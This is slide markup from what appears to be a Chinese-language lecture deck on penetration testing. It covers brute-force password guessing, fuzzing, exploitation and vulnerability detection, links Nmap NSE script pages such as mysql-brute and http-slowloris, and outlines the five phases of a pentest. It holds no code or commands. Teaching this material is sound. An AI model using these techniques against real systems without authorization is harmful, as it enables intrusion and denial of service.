                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>暴力破解密碼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240774" y="2049065"/>
            <a:ext cx="1752211" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t> password guessing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115758" y="857250"/>
            <a:ext cx="2262158" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4050" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28620420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7160" y="957500"/>
            <a:ext cx="2252663" cy="620108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Fuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>模糊測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="1703070"/>
            <a:ext cx="5211614" cy="2966085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2733521" y="1232921"/>
            <a:ext cx="6339116" cy="4665435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4392348" y="957499"/>
            <a:ext cx="3939925" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://nmap.org/nsedoc/scripts/dns-fuzz.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35184303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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="5173489"/>
            <a:ext cx="8315325" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>GITHUB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>nccgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>-vulnerability-scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://github.com/nccgroup/nmap-nse-vulnerability-scripts/tree/master</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368409" y="1653836"/>
            <a:ext cx="8146941" cy="2849108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="193175" y="983291"/>
            <a:ext cx="2222083" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>exploit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>攻擊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8297816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177061"/>
            <a:ext cx="7772400" cy="305077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>滲透測試</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="666680"/>
            <a:ext cx="7772400" cy="5867123"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Penetration Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，是為了證明網路防禦有按照預期計畫正常執行的一種機制，測試方式為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用、模擬駭客與惡意使用者的思維，嘗試攻破入侵企業網站、資訊系統或設備等軟體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，分析測試目標的風險層級，評估安全性是否有待加強，而這項測試的最終目的，是為了在受到真正的攻擊之前，能夠提早發現安全性的漏洞並加以改善修正。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>簡單</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來說，就是以毒攻毒、以毒試毒的概念進行測試目標的模擬攻擊，並在攻擊後回報潛在漏洞給開發人員進行修補</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試的流程可分為五個步驟，如下。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>準備階段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>確認執行的方式、範圍、時間與測試計畫，並蒐集受測目標的公開資訊，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位置和帳號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>蒐集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>依循</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OSSYMM(Open Source Security Testing Methodology Manual)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建立執行架構、策略、資料蒐集、分析與目標滲透步驟，並測試是否有敏感資訊或系統訊息洩漏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>資料分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>、弱點掃描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>掃描受測目標已知的弱點，各項測試廠商提供與採用的測試標準不一，但大多都會以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OWASP(Open Web Application Security Project)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所提供的年度十大安全風險排行榜所揭露的風險作為主要的檢測標準。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試應用程式、軟體、邏輯與系統，以不同的方式執行滲透測試的作業，並破解密碼等目標項目。若取得伺服器控制權限，會再嘗試取得伺服器最高權限，或滲透內網其他伺服器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>弱點</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>報告</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試完畢，獲取測試報告書。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28088444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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4723686" y="1014777"/>
            <a:ext cx="3791665" cy="2238621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4758928" y="3319463"/>
            <a:ext cx="3258578" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="81707" y="1471613"/>
            <a:ext cx="4280578" cy="4152900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192704" y="5761434"/>
            <a:ext cx="3515706" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="900" dirty="0"/>
              <a:t>https://nmap.org/nsedoc/scripts/mysql-empty-password.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4758928" y="5733588"/>
            <a:ext cx="3368230" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1050" dirty="0"/>
              <a:t>https://nmap.org/nsedoc/scripts/mysql-brute.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="81707" y="836295"/>
            <a:ext cx="1877437" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>漏洞檢測</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30078568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628650" y="3429001"/>
            <a:ext cx="6238875" cy="2230043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277216" y="3828663"/>
            <a:ext cx="4374852" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://nmap.org/nsedoc/scripts/http-slowloris.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="1276136"/>
            <a:ext cx="6832997" cy="1953033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159053" y="1737119"/>
            <a:ext cx="4913461" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0"/>
              <a:t>https://nmap.org/nsedoc/scripts/http-slowloris-check.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圓角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343025" y="1971675"/>
            <a:ext cx="776288" cy="15716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圓角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438275" y="4162425"/>
            <a:ext cx="1062038" cy="15716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0" name="投影片編號版面配置區 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27847773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71450" y="2494596"/>
            <a:ext cx="5505450" cy="3300097"/>
